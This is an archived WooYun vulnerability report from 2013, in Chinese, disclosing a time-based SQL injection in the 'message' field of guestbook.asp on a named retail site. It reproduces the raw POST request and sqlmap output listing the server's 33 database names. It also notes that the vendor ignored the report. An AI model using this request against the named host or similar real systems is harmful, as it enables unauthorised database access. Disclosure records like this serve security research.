当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041263

漏洞标题:我们都是好孩子##好孩子育儿网某站post注入导致可以畅游各个管理系统

相关厂商:好孩子育儿网

漏洞作者: PgHook

提交时间:2013-10-28 12:48

修复时间:2013-11-02 12:48

公开时间:2013-11-02 12:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-28: 细节已通知厂商并且等待厂商处理中
2013-11-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我们都是好孩子,异想天开的孩子......
我们都是好孩子,最最善良的孩子......

详细说明:

漏洞网站:http://tcdrp.gb246.com/

11.jpg


post信息:

POST /guestbook.asp HTTP/1.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDACDBSBDC=CHDHIJDCGJNKLBCEBHANDECK
Host: tcdrp.gb246.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
message=*


message存在注入

1.jpg


2.jpg


漏洞证明:

available databases [33]:
[*] [mkpos-zy004]
[*] ADFSADFSADF
[*] BindDB
[*] BranchDHH
[*] BranchDHH_JH201303
[*] BranchDHH_JS201302
[*] BranchDHH_SH201301
[*] BranchDHH_SH201306
[*] DrpCenterTCHZData
[*] DrpCenterTCHZSys
[*] DrpCenterZDSNSys
[*] DrpCenterZSM0521Data
[*] DRPCenterZSMData
[*] DrpCenterZTC0306Sys
[*] DrpCenterZTC0521Data
[*] DrpCenterZTC0715sys111
[*] DrpCenterZTC0813Sys
[*] DrpCenterZTC0822Sys
[*] DrpCenterZTCData
[*] DrpCenterZTCSys
[*] master
[*] model
[*] msdb
[*] TCHZDATA20120920
[*] TCHZSYS20120920
[*] tempdb
[*] Test
[*] TMPOSDB
[*] TMPOSDB201110
[*] TMPOSDB201204
[*] TMPOSDB201205
[*] TMPOSDB201210
[*] ZSM1202241
[06:18:34] [INFO] fetched data logged to text files under '/root/sqlmap/output/tcdrp.gb246.com'


由于是基于时间的注入,服务器影响不好,就不再看了。

修复方案:

如果所以的管理系统的数据都在一起,那就悲剧了,相当与我可以畅游所有的管理系统了。
危害就不多说了。

版权声明:转载请注明来源 PgHook@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-11-02 12:48

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-28 14:49 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    汗!!小漏洞,走了,不来了。。